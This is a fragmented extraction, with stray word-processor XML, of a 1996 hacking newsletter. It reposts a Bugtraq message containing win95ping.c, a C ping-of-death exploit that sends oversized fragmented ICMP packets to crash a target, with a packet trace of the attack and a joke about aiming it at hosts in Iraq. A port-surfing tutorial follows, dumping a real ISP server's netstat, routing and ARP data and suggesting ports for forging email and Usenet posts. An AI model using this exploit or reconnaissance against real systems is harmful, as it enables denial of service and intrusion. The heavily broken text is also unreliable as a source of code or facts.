&lt;BUGTRAQ@netspace.org&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Ping exploit progra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some people don't necessarily have Windows '95 boxes lying around, I (Fenner) wrote the following exploit program. It requires a raw socket layer that doesn't mess with the packet, so BSD 4.3, SunOS and Solaris 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 It works fine on 4.4BSD systems. It should work on Linux if you compile with -DREALLY_RA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el free to do with this what you want. Please use this tool only to test your own machines, and not to crash oth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in95ping.c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imulate the evil win95 "ping -l 65510 buggy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ersion 1.0 Bill Fenner &lt;fenner@freebsd.org&gt; 22-Oct-199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is requires raw sockets that don't mess with the packet at all (oth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n adding the checksum). That means that SunOS, Solaris, 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SD4.3-based systems are out. BSD4.4 systems (FreeBSD, NetBS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penBSD, BSDI) will work. Linux might work, I don't have a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ystem to try it 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attack from the Win95 box looks lik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3622 cslwin95 &gt; arkroyal: icmp: echo request (frag 6144:148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5079 cslwin95 &gt; arkroyal: (frag 6144:1480@14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6637 cslwin95 &gt; arkroyal: (frag 6144:1480@29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7577 cslwin95 &gt; arkroyal: (frag 6144:1480@44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18833 cslwin95 &gt; arkroyal: (frag 6144:1480@59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0112 cslwin95 &gt; arkroyal: (frag 6144:1480@74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1346 cslwin95 &gt; arkroyal: (frag 6144:1480@88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2641 cslwin95 &gt; arkroyal: (frag 6144:1480@103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3869 cslwin95 &gt; arkroyal: (frag 6144:1480@118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5140 cslwin95 &gt; arkroyal: (frag 6144:1480@133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6604 cslwin95 &gt; arkroyal: (frag 6144:1480@148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7628 cslwin95 &gt; arkroyal: (frag 6144:1480@162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28871 cslwin95 &gt; arkroyal: (frag 6144:1480@177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0100 cslwin95 &gt; arkroyal: (frag 6144:1480@192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1307 cslwin95 &gt; arkroyal: (frag 6144:1480@207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2542 cslwin95 &gt; arkroyal: (frag 6144:1480@222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3774 cslwin95 &gt; arkroyal: (frag 6144:1480@236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5018 cslwin95 &gt; arkroyal: (frag 6144:1480@251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6576 cslwin95 &gt; arkroyal: (frag 6144:1480@266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7464 cslwin95 &gt; arkroyal: (frag 6144:1480@281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8696 cslwin95 &gt; arkroyal: (frag 6144:1480@296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39966 cslwin95 &gt; arkroyal: (frag 6144:1480@310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1218 cslwin95 &gt; arkroyal: (frag 6144:1480@325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2579 cslwin95 &gt; arkroyal: (frag 6144:1480@340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3807 cslwin95 &gt; arkroyal: (frag 6144:1480@355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6276 cslwin95 &gt; arkroyal: (frag 6144:1480@370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7236 cslwin95 &gt; arkroyal: (frag 6144:1480@384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8478 cslwin95 &gt; arkroyal: (frag 6144:1480@399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49698 cslwin95 &gt; arkroyal: (frag 6144:1480@414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0929 cslwin95 &gt; arkroyal: (frag 6144:1480@429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2164 cslwin95 &gt; arkroyal: (frag 6144:1480@444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3398 cslwin95 &gt; arkroyal: (frag 6144:1480@458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4685 cslwin95 &gt; arkroyal: (frag 6144:1480@473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6347 cslwin95 &gt; arkroyal: (frag 6144:1480@488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7313 cslwin95 &gt; arkroyal: (frag 6144:1480@503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8357 cslwin95 &gt; arkroyal: (frag 6144:1480@518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59588 cslwin95 &gt; arkroyal: (frag 6144:1480@532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0787 cslwin95 &gt; arkroyal: (frag 6144:1480@547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2023 cslwin95 &gt; arkroyal: (frag 6144:1480@562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3247 cslwin95 &gt; arkroyal: (frag 6144:1480@577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4479 cslwin95 &gt; arkroyal: (frag 6144:1480@592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6252 cslwin95 &gt; arkroyal: (frag 6144:1480@6068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6957 cslwin95 &gt; arkroyal: (frag 6144:1480@6216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8220 cslwin95 &gt; arkroyal: (frag 6144:1480@6364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7:26:11.069107 cslwin95 &gt; arkroyal: (frag 6144:398@651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stdio.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sys/types.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sys/socket.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db.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n.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n_systm.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p.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lt;netinet/ip_icmp.h&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f your kernel doesn't muck with raw packets, #define REALLY_RA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is is probably only Linu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def REALLY_RA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FIX(x) htons(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FIX(x) (x)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i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int argc, char **argv)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 buf[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ip *ip = (struct ip *)bu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icmp *icmp = (struct icmp *)(ip +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hostent *h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 sockaddr_in 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offs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 on =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zero(buf, sizeof bu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 = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) &lt;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ror("sock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etsockopt(s, IPPROTO_IP, IP_HDRINCL, &amp;on, sizeof(on)) &lt;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ror("IP_HDRINC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rgc != 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printf(stderr, "usage: %s hostname\n", argv[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t(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hp = gethostbyname(argv[1])) == NULL)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p-&gt;ip_dst.s_addr = inet_addr(argv[1])) == -1)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printf(stderr, "%s: unknown host\n", argv[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ls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copy(hp-&gt;h_addr_list[0], &amp;ip-&gt;ip_dst.s_addr, hp-&gt;h_lengt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tf("Sending to %s\n", inet_ntoa(ip-&gt;ip_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v = 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hl = sizeof *ip &gt;&gt; 2;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tos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len = FIX(sizeof bu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id = htons(432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off = FIX(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ttl = 255;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p = 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sum = 0; /* kernel fills i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src.s_addr = 0; /* kernel fills i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st.sin_addr = ip-&gt;ip_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st.sin_family = AF_I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type = ICMP_ECH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ode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ksum = htons(~(ICMP_ECHO &lt;&lt; 8));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checksum of all 0's is easy to comput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offset = 0; offset &lt; 65536; offset += (sizeof buf - sizeof *i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off = FIX(offset &gt;&gt; 3);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offset &lt; 6512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off |= FIX(IP_M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p-&gt;ip_len = FIX(418); /* make total 65538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sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&amp;d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zeof dst) &lt;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printf(stderr, "offset %d: ", offs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ror("sendt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offset == 0)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type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ode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mp-&gt;icmp_cksum =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Fenner's ping exploit messa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GO TO JAIL NOTE: Not only is this hack not elite, if you are reading this you don't know enough to keep from getting busted from doing this ping hack. On the other hand, if you were to do it to an Internet host in Iraq...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course there are many other kewl things you can do with ping. If you have a shell account, you can find out lots of stuph about ping by giving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you can get lots of details on any Unix command with "m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fun with ping -- and be good! But remember, I'm not begging the evil genius wannabes to be good. See if I care when you get bus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ubscribe, email hacker@techbroker.com with message “subscribe hh.” To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com. Please direct flames to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null@techbroker.com.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O (mostly) HARMLESS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 2 Number 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intro to TCP/IP: port surfing! Daemons! How to get on almost any computer without logging in and without breaking the law. Impress your clueless friends and actually discover kewl, legal, safe stup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w days ago I had a lady friend visiting. She’s 42 and doesn’t own a computer. However, she is taking a class on personal computers at a community college. She wanted to know what all this hacking stuph is about. So I decided to introduce her to port surfing. And while doing it, we stumbled across something kew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surfing takes advantage of the structure of TCP/IP. This is the protocol (set of rules) used for computers to talk to each other over the Internet. One of the basic principles of Unix (the most popular operating system on the Internet) is to assign a “port” to every function that one computer might command another to perform. Common examples are to send and receive email, read Usenet newsgroups, telnet, transfer files, and offer Web pag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1: A computer port is a place where information goes in or out of it. On your home computer, examples of ports are your monitor, which sends information out, your keyboard and mouse, which send information in, and your modem, which sends information both out and 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an Internet host computer such as callisto.unm.edu has many more ports than a typical home computer. These ports are identified by numbers. Now these are not all physical ports, like a keyboard or RS232 serial port (for your modem). They are virtual (software) por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ervice” is a program running on a “port.” When you telnet to a port, that program is up and running, just waiting for your input.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if you want to read a Web page, your browser contacts port number 80 and tells the computer that manages that Web site to let you in. And, sure enough, you get into that Web server computer without a passwor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 big deal. That’s pretty standard for the Internet. Many -- most -- computers on the Internet will let you do some things with them without needing a passwor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 essence of hacking is doing things that aren’t obvious. That don’t just jump out at you from the manuals. One way you can move a step up from the run of the mill computer user is to learn how to port sur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ssence of port surfing is to pick out a target computer and explore it to see what ports are open and what you can do with the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f you are a lazy hacker you can use canned hacker tools such as Satan or Netcat. These are programs you can run from Linux, FreeBSD or Solaris (all types of Unix) from your PC. They automatically scan your target computers. They will tell you what ports are in use. They will also probe these ports for presence of daemons with know security flaws, and tell you what they a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 2: A daemon is not some sort of grinch or gremlin or 666 guy. It is a program that runs in the background on many (but not all) Unix system ports. It waits for you to come along and use it. If you find a daemon on a port, it’s probably hackable. Some hacker tools will tell you what the hackable features are of the daemons they detec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here are several reasons to surf ports by hand instead of automaticall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You will learn something. Probing manually you get a gut feel for how the daemon running on that port behaves. It’s the difference between watching an x-rated movie and (blus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You can impress your friends. If you run a canned hacker tool like Satan your friends will look at you and say, “Big deal. I can run programs, too.” They will immediately catch on to the dirty little secret of the hacker world. Most hacking exploits are just lamerz running programs they picked up from some BBS or ftp site. But if you enter commands keystroke by keystroke they will see you using your brain. And you can help them play with daemons, too, and give them a giant rus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truly elite hackers surf ports and play with daemons by hand because it is the only way to discover something new. There are only a few hundred hackers -- at most -- who discover new stuph. The rest just run canned exploits over and over and over again. Boring. But I am teaching you how to reach the pinnacle of hackerd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let me tell you what my middle aged friend and I discovered just messing around. First, we decided we didn’t want to waste our time messing with some minor little host computer. Hey, let’s go for the big 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ow do you find a big kahuna computer on the Internet? We started with a domain which consisted of a LAN of PCs running Linux that I happened to already know about, that is used by the New Mexico Internet Access ISP: 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bie Note # 3: A domain is an Internet address. You can use it to look up who runs the computers used by the domain, and also to look up how that domain is connected to the rest of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to do this we first logged into my shell account with Southwest Cyberport. I gave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6] -&gt;whois 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Mexico Internet Access (NMIA-D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01 Buena Vista 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uquerque, NM 8710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ain Name: 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istrative Contact, Technical Contact, Zone Contac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rell, Stan (SO11) SAO@NMIA.CO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5) 877-0617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 last updated on 11-Mar-9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 created on 11-Mar-94.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main servers in listed ord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NMIA.COM 198.59.166.1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DE.NM.ORG 129.121.1.2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t’s a good bet that grande.nm.org is serving a lot of other Internet hosts beside nmia.com. Here’s how we port surf our way to find this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7] -&gt;telnet grande.nm.org 15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GV MultiNet V3.5 Rev B, VAX 4000-400, OpenVMS VAX V6.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ct License Authorization Expiration Da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Yes A-137-1641 (n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FS-CLIENT Yes A-137-113237 (n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figuration for file "MULTINET:NETWORK_DEVICES.CONFIGURATIO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ice Adapter CSR Address Flags/Vecto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0 (Shared VMS Ethernet/FDDI) -NONE- -NONE- -N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Active Connections, including ser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 Rcv-Q Snd-Q Local Address (Port) Foreign Address (Port) Stat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822 GRANDE.NM.ORG(NETSTAT) 198.59.115.24(1569)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POP3) 164.64.201.67(1256)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918) 129.121.254.5(TELNET)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TELNET) AVATAR.NM.ORG(314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NAMESERVICE)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TELNET)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FTP)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FINGER)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NETSTAT)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SMTP)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LOGIN)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SHELL)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EXEC)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RPC)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NETCONTROL)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SYSTAT)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CHARGEN)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DAYTIME)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TIME)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ECHO)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DISCARD)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PRINTER)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POP2)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POP3)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KERBEROS_MASTER) *(*) LISTEN </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="360" w:right="360" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP 0 0 *(KLOGIN)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KSHELL)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174) OSO.NM.ORG(X1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172) OSO.NM.ORG(X1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GRANDE.NM.ORG(4171) OSO.NM.ORG(X11)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CP 0 0 *(FS) *(*) LISTE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NAMESERVIC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127.0.0.1(NAMESERVIC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GRANDE.NM.OR(NAMESERV)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TFT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BOOTP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KERBERO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127.0.0.1(KERBERO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GRANDE.NM.OR(KERBERO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SNM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RPC)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DAYTIM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ECHO)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DISCARD)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TIME)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CHARGEN)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TALK)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NTALK)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1023)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P 0 0 *(XDMCP)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registered RPC progra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Version Protocol Por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MAP 2 TCP 11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MAP 2 UDP 111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IP Routing tab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ination Gateway Flags Refcnt Use Interface MT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1 LAWRII.NM.ORG Up,Gateway,H 0 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6.45.0.1 ENSS365.NM.ORG Up,Gateway,H 0 416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38.138.1 ENSS365.NM.ORG Up,Gateway,H 0 7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27.160.1 ENSS365.NM.ORG Up,Gateway,H 0 29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7.0.0.1 127.0.0.1 Up,Host 5 1183513 lo0 413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2 LAWRII.NM.ORG Up,Gateway,H 0 64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89.2 ENSS365.NM.ORG Up,Gateway,H 0 72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77.56.2 ENSS365.NM.ORG Up,Gateway,H 0 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97.213.2 ENSS365.NM.ORG Up,Gateway,H 0 264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90.74.66 ENSS365.NM.ORG Up,Gateway,H 0 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52.102.2 ENSS365.NM.ORG Up,Gateway,H 0 10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0.243.2 ENSS365.NM.ORG Up,Gateway,H 0 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213.4.2 ENSS365.NM.ORG Up,Gateway,H 0 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216.224.66 ENSS365.NM.ORG Up,Gateway,H 0 11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89.3 ENSS365.NM.ORG Up,Gateway,H 0 110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203.196.67 ENSS365.NM.ORG Up,Gateway,H 0 38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205.13.3 ENSS365.NM.ORG Up,Gateway,H 0 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247.107.131 ENSS365.NM.ORG Up,Gateway,H 0 1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4 LAWRII.NM.ORG Up,Gateway,H 0 8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48.157.6 ENSS365.NM.ORG Up,Gateway,H 0 19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45.10.6 ENSS365.NM.ORG Up,Gateway,H 0 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21.50.7 ENSS365.NM.ORG Up,Gateway,H 0 305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170.113.8 ENSS365.NM.ORG Up,Gateway,H 0 145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48.128.9 ENSS365.NM.ORG Up,Gateway,H 0 11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7.132.9 ENSS365.NM.ORG Up,Gateway,H 0 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16.57.10 ENSS365.NM.ORG Up,Gateway,H 0 18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0.74.1.75 ENSS365.NM.ORG Up,Gateway,H 0 1011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68.65.15 ENSS365.NM.ORG Up,Gateway,H 0 24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9.219.13.81 ENSS365.NM.ORG Up,Gateway,H 0 54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55.246.18 ENSS365.NM.ORG Up,Gateway,H 0 11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45.24.21 ENSS365.NM.ORG Up,Gateway,H 0 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8.168.21 ENSS365.NM.ORG Up,Gateway,H 0 209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179.3.222 ENSS365.NM.ORG Up,Gateway,H 0 31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09.130.33 ENSS365.NM.ORG Up,Gateway,H 0 18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224.108.33 ENSS365.NM.ORG Up,Gateway,H 0 1136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3.7.132.98 ENSS365.NM.ORG Up,Gateway,H 0 7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11.253.35 ENSS365.NM.ORG Up,Gateway,H 0 113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149.24.100 ENSS365.NM.ORG Up,Gateway,H 0 33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5.212.105.106 ENSS365.NM.ORG Up,Gateway,H 0 17 se0 1006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238.3.241 ENSS365.NM.ORG Up,Gateway,H 0 6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49.44.242 ENSS365.NM.ORG Up,Gateway,H 0 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4.22.188.242 ENSS365.NM.ORG Up,Gateway,H 0 2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4.64.0 LAWRII.NM.ORG Up,Gateway 1 4037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0 ENSS365.NM.ORG Up,Gateway 2 472874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 GLORY.NM.ORG Up,Gateway 0 5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6.1 GLORY.NM.ORG Up,Gateway 0 19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 LAWRII.NM.ORG Up,Gateway 0 5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2 GLORY.NM.ORG Up,Gateway 0 13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2 129.121.248.1 Up,Gateway 0 634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67 GLORY.NM.ORG Up,Gateway 0 20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67 GLORY.NM.ORG Up,Gateway 0 77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68 LAWRII.NM.ORG Up,Gateway 0 318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5 GLORY.NM.ORG Up,Gateway 0 62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69 GLORY.NM.ORG Up,Gateway 0 799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6 GLORY.NM.ORG Up,Gateway 0 5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0 LAWRII.NM.ORG Up,Gateway 0 1801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88.135 GLORY.NM.ORG Up,Gateway 0 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71 LAWRII.NM.ORG Up,Gateway 0 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 GLORY.NM.ORG Up,Gateway 0 3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89.135 GLORY.NM.ORG Up,Gateway 0 9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36 LAWRII.NM.ORG Up,Gateway 0 129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 GLORY.NM.ORG Up,Gateway 0 2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3 GLORY.NM.ORG Up,Gateway 0 5979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9.138.0 GLORY.NM.ORG Up,Gateway 0 526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92.10 LAWRII.NM.ORG Up,Gateway 0 16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75 LAWRII.NM.ORG Up,Gateway 0 60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3 GLORY.NM.ORG Up,Gateway 0 118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7 LAWRII.NM.ORG Up,Gateway 0 364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4 GLORY.NM.ORG Up,Gateway 0 33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8 GLORY.NM.ORG Up,Gateway 0 23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52.207 GLORY.NM.ORG Up,Gateway 0 29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79 GLORY.NM.ORG Up,Gateway 0 129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60.144 LAWRII.NM.ORG Up,Gateway 0 11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80 PENNY.NM.ORG Up,Gateway 0 466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0 GLORY.NM.ORG Up,Gateway 0 9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99.209 LAWRII.NM.ORG Up,Gateway 0 113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7.66.17 GLORY.NM.ORG Up,Gateway 0 2417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2 GLORY.NM.ORG Up,Gateway 0 2976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41.211 GLORY.NM.ORG Up,Gateway 0 15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89.147 LAWRII.NM.ORG Up,Gateway 0 313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4 PENNY.NM.ORG Up,Gateway 0 18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7 LAWRII.NM.ORG Up,Gateway 0 9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6.88.0 GLORY.NM.ORG Up,Gateway 0 14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84.24 GLORY.NM.ORG Up,Gateway 0 353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88 LAWRII.NM.ORG Up,Gateway 0 13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49.217 GLORY.NM.ORG Up,Gateway 0 30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2.89 GLORY.NM.ORG Up,Gateway 0 351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76.219 GLORY.NM.ORG Up,Gateway 0 127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92 LAWRII.NM.ORG Up,Gateway 0 122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234.220 129.121.1.91 Up,Gateway 0 233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2 LAWRII.NM.ORG Up,Gateway 0 1399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57 LAWRII.NM.ORG Up,Gateway 0 50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93 GLORY.NM.ORG Up,Gateway 0 63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3 GLORY.NM.ORG Up,Gateway 0 90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58 LAWRII.NM.ORG Up,Gateway 0 142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59 LAWRII.NM.ORG Up,Gateway 0 180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95 PENNY.NM.ORG Up,Gateway 0 364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96 GLORY.NM.ORG Up,Gateway 0 99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1 LAWRII.NM.ORG Up,Gateway 0 52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97 PENNY.NM.ORG Up,Gateway 0 5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1 LAWRII.NM.ORG Up,Gateway 0 4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207.226 GLORY.NM.ORG Up,Gateway 0 9321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99 PENNY.NM.ORG Up,Gateway 0 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3 GLORY.NM.ORG Up,Gateway 0 337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3.100 LAWRII.NM.ORG Up,Gateway 0 364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00 GLORY.NM.ORG Up,Gateway 0 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65.0 PENNY.NM.ORG Up,Gateway 0 1585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5 GLORY.NM.ORG Up,Gateway 0 27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5 LAWRII.NM.ORG Up,Gateway 0 16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2 GLORY.NM.ORG Up,Gateway 0 53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0.230.0 LAWRII.NM.ORG Up,Gateway 0 1940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6 LAWRII.NM.ORG Up,Gateway 0 175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6.231 GLORY.NM.ORG Up,Gateway 0 32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7 GLORY.NM.ORG Up,Gateway 0 1568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3 GLORY.NM.ORG Up,Gateway 0 362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68 GLORY.NM.ORG Up,Gateway 0 906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4 GLORY.NM.ORG Up,Gateway 0 733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8 GLORY.NM.ORG Up,Gateway 0 23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05 LAWRII.NM.ORG Up,Gateway 0 482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05 LAWRII.NM.ORG Up,Gateway 0 4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41 LAWRII.NM.ORG Up,Gateway 0 4178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69 GLORY.NM.ORG Up,Gateway 0 510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42 GLORY.NM.ORG Up,Gateway 0 1076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0 GLORY.NM.ORG Up,Gateway 0 9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49.44 GLORY.NM.ORG Up,Gateway 0 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08 GLORY.NM.ORG Up,Gateway 0 212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29.236 GLORY.NM.ORG Up,Gateway 0 12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2 GLORY.NM.ORG Up,Gateway 0 583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08 GLORY.NM.ORG Up,Gateway 0 32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3 GLORY.NM.ORG Up,Gateway 0 37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75.173 LAWRII.NM.ORG Up,Gateway 0 622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10 GLORY.NM.ORG Up,Gateway 0 17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1.238 GLORY.NM.ORG Up,Gateway 0 135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136.110 GLORY.NM.ORG Up,Gateway 0 58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48 GLORY.NM.ORG Up,Gateway 0 4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175.176 LAWRII.NM.ORG Up,Gateway 0 3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14 LAWRII.NM.ORG Up,Gateway 0 4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79 LAWRII.NM.ORG Up,Gateway 0 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79 PENNY.NM.ORG Up,Gateway 0 22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59.115 GLORY.NM.ORG Up,Gateway 1 13288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1 GLORY.NM.ORG Up,Gateway 0 135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2 SIENNA.NM.ORG Up,Gateway 0 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18 GLORY.NM.ORG Up,Gateway 0 342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19 GLORY.NM.ORG Up,Gateway 0 28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3 SIENNA.NM.ORG Up,Gateway 0 247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3.120.0 LAWRII.NM.ORG Up,Gateway 0 123533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84 GLORY.NM.ORG Up,Gateway 0 111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5.167.120 GLORY.NM.ORG Up,Gateway 0 4202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1 GLORY.NM.ORG Up,Gateway 1 7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9.121.0 GRANDE.NM.ORG Up 12 2165859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2 GLORY.NM.ORG Up,Gateway 0 195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58 GLORY.NM.ORG Up,Gateway 0 770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8.123.0 GLORY.NM.ORG Up,Gateway 0 34416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59 GLORY.NM.ORG Up,Gateway 0 100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4 GLORY.NM.ORG Up,Gateway 0 3716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4 LAWRII.NM.ORG Up,Gateway 0 7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5 PENNY.NM.ORG Up,Gateway 0 23335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6 GLORY.NM.ORG Up,Gateway 0 497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26 LAWRII.NM.ORG Up,Gateway 0 1364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69.190 GLORY.NM.ORG Up,Gateway 0 4059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90 GLORY.NM.ORG Up,Gateway 0 1630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4.134.127 GLORY.NM.ORG Up,Gateway 0 45621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6.206.191 GLORY.NM.ORG Up,Gateway 0 3574 se0 150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IPX Routing tab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tination Gateway Flags Refcnt Use Interface MT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ARP tab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st Network Address Ethernet Address Arp Flag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ORY.NM.ORG (IP 129.121.1.4) AA:00:04:00:61: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1.1) 00:C0:05:01:2C:D2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RANJO.NM.ORG (IP 129.121.1.56) 08:00:87:04:9F:42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MA.NM.ORG (IP 129.121.1.8) AA:00:04:00:0C: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1.5) AA:00:04:00:D2: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WRII.NM.ORG (IP 129.121.254.10) AA:00:04:00:5C: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1.91) 00:C0:05:01:2C:D2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VO.NM.ORG (IP 129.121.1.6) AA:00:04:00:0B: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NY.NM.ORG (IP 129.121.1.10) AA:00:04:00:5F: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RIBA.NM.ORG (IP 129.121.1.14) 08:00:2B:BC:C1:A7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UL.NM.ORG (IP 129.121.1.51) 08:00:87:00:A1:D3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S365.NM.ORG (IP 129.121.1.3) 00:00:0C:51:EF:58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ATAR.NM.ORG (IP 129.121.254.1) 08:00:5A:1D:52:0D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3.2) 08:00:5A:47:4A:1D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4.5) 00:C0:7B:5F:5F:8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HAS.NM.ORG (IP 129.121.1.11) 08:00:5A:47:4A:1D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KNOWN] (IP 129.121.253.10) AA:00:04:00:4B:D0 Temporar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Network Interface statist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e Mtu Network Address Ipkts Ierrs Opkts Oerrs Colli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0 1500 129.121.0 GRANDE.NM.ORG 68422948 0 53492833 1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0 4136 127.0.0 127.0.0.1 1188191 0 1188191 0 0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Protocol statist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264173 IP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P packets smaller than minimum siz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928 IP fragmen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P fragments timed ou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 IP received for unreachable destina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4140 ICMP error packets genera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667 ICMP opcodes out of rang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70 Bad ICMP packet checksu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363 ICMP respon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363 ICMP "Echo"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4363 ICMP "Echo Rep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339 ICMP "Echo Reply"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4140 ICMP "Destination Unreachable"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1243 ICMP "Destination Unreachable"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88 ICMP "Source Quench"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911 ICMP "ReDirect"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9732 ICMP "Time Exceeded"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6966 TCP connections initia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3998 TCP connections establish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2611 TCP connections accep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972 TCP connections dropp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182 embryonic TCP connections dropp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9399 TCP connections clo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711838 TCP segments timed for RT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05140 TCP segments updated RT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27264 TCP delayed ACK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6 TCP connections dropped due to retransmit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040 TCP retransmit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36 TCP persist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TCP persist connection drop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850 TCP keepalive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95 TCP keepalive probe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392 TCP connections dropped due to keepalive timeout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842663 TCP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714484 TCP data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6060086 TCP data byte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321 TCP data packets retransmit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144036 TCP data bytes retransmit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02199 TCP ACK-on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02 TCP window probe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3 TCP URG-on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06175 TCP Window-Update-only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59509 TCP control packets s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675084 TCP packets receiv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399363 TCP packets received in sequen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29418386 TCP bytes received in sequenc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207 TCP packets with checksum erro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3374 TCP packets were duplic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0525708 TCP bytes were duplic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48 TCP packets had some duplicate by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3214 TCP bytes were partial duplic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17156 TCP packets were out of ord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51204672 TCP bytes were out of ord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15 TCP packets had data after windo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65443 TCP bytes were after window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04 TCP packets for already closed connec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41 TCP packets were window prob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847459 TCP packets had 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2657 TCP packets had duplicate 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CP packet ACKed unsent dat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0274739 TCP bytes ACK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1545 TCP packets had window updat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TCP segments dropped due to PAW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658158 TCP segments were predicted pure-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033756 TCP segments were predicted pure-dat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87980 TCP PCB cache mi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5 Bad UDP header checksum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Bad UDP data length field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772272 UDP PCB cache mi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Net Buffer Statist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8 out of 608 buffers in u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buffers allocated to Data.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buffers allocated to Packet Head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 buffers allocated to Socket Structur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buffers allocated to Protocol Control Blo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 buffers allocated to Routing Table Entri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ffers allocated to Socket Names and Addr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 buffers allocated to Kernel Fork-Proc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ffers allocated to Interface Addr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uffer allocated to Multicast Address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uffer allocated to Timeout Callba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uffers allocated to Memory Managemen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ffers allocated to Network TTY Control Bloc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out of 43 page clusters in u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CXBs borrowed from VMS device dri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XBs waiting to return to the VMS device driv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2 Kbytes allocated to MultiNet buffers (44% in us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6 Kbytes of allocated buffer address space (0% of maximum).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8] -&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a! What was all tha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 did was telnet to port 15 -- the netstat port-- which on some computers runs a daemon that tells anybody who cares to drop in just about everything about the connection made by all the computers linked to the Internet through this compu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from this we learned two thing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rande.nm.org is a very busy and important compu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ven a very busy and important computer can let the random port surfer come and play.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my lady friend wanted to try out another port. I suggested the finger port, number 79. So she gave the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8]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g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FING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HEL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telnet grande.nm.org 79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ing 129.121.1.2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ed to grande.nm.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cape character is '^]'.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ry, could not find "MA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closed by foreign hos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slug&gt; [69] -&g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first this looks like just a bunch of failed commands. But actually this is pretty fascinating. The reason is that port 79 is, under IETF rules, supposed to run fingerd, the finger daemon. So when she gave the command “finger” and grande.nm.org said ?Sorry, could not find "FINGER,” we knew this port was not following IETF ru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on may computers they don’t run the finger daemon at all. This is because finger has so properties that can be used to gain total control of the computer that runs i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f finger is shut down, and nothing else is running on port 79, we woudl get the answ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net: connect: Connection refu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instead we got connected and grande.nm.org was waiting for a comma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 normal thing a port surfer does when running an unfmiliar daemon is to coax it into revealing what commands it uses. “Help,” “?” and “man” often work. But it didn’t help u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even though these commands didn’t help us, they did tell us that the daemon is probably something sensitive. If it were a daemon that was meant for anybody and his brother to use, it would have given us instructio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what did we do next? We decided to be good Internet citizens and also stay out of jail We decided we’d beter log off.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ere was one hack we decided to do first: leave our mark on the shell log fil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hell log file keeps a record of all operating system commands made on a computer. The adminsitrator of an obviously important computer such as grande.nm.org is probably competent enough to scan the records of what commands are given by whom to his computer. Especially on a port important enough to be running a mystery, non-IETF daemon. So everything we types while connected was saved on a lo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my friend giggled with glee and left a few messages on port 79 before logging off. Oh, dear, I do believe she’s hooked on hacking. Hmmm, it could be a good way to meet cute sysadmin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port surf’s up! If you want to surf, here’s the basic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t logged on to a shell account. That’s an account with your ISP that lets you give Unix commands. Or -- run Linux or some other kind of Unix on your PC and hook up to the Internet.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ive the command “telnet &lt;hostname&gt; &lt;pot number&gt;“ where &lt;hostname&gt; is the internet address of the computer you wnat to visit and &lt;port number&gt; is whatever looks phun to you.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f you get the response “connected to &lt;hostname&gt;,” then surf’s u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are some of my favorite ports. It is legal and harmless to pay them visits so long as you don’t figure out how to gain superuser status while playing with them. However, please note that if you do too much port surfing from your shell account, your sysadmin may notice this in his or her shell log file. If he or she is prejudiced against hacking , you may get kicked off your ISP. So you may want to explain in advance that you are merely a harmless hacker looking to have a good time, er, um, learn about Unix. Yeh, that sounds goo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number Service Why it’s phu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echo Whatever you type in, the host repeats back to you, used for p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discard Dev/null -- how fast can you figure out this on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systat Lots of info on us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daytime Time and date at computer’s loc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netstat Tremendous info on networks but rarely used any mor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chargen Pours out a stream of ASCII characters. Use ^C to stop.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ftp Transfers fil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sh secure shell login -- encrypted tunne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telnet Where you log in if you don’t use ssh:)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smpt Forge email from Bill.Gates@Microsoft.or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time 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rlp Resource loc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whois Info on hosts and network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domain Name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 gopher Out-of-date info hunt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9 finger Lots of info on us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 http Web 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0 pop Incoming emai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9 nntp Usenet news groups -- forge posts, cancel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3 shttp Another web server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 biff Mail notificatio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3 rlogin Remote login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 Remote who and uptim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4 shell Remote command, no password us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log Remote system logging -- how we bust hacker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0 route Routing information protocol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eller head tip: Note that in most cases an Internet host will use these port number assignments for these services. More than one service may also be assigned simultaneously to the same port. This numbering system is voluntarily offered by the Internet Engineering Task Force (IETF). That means that an Internet host may use other ports for these services. Expect the unexpecte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a copy of Linux, you can get the list of all the IETF assignments of port numbers in the file /etc/services.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ubscribe to the Happy Hacker list, email hacker@techbroker.com with messge “subscribe hh.” Send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com. Please direct flames to dev/null@techbroker.com. Happy hacking!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yright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end..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 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="360"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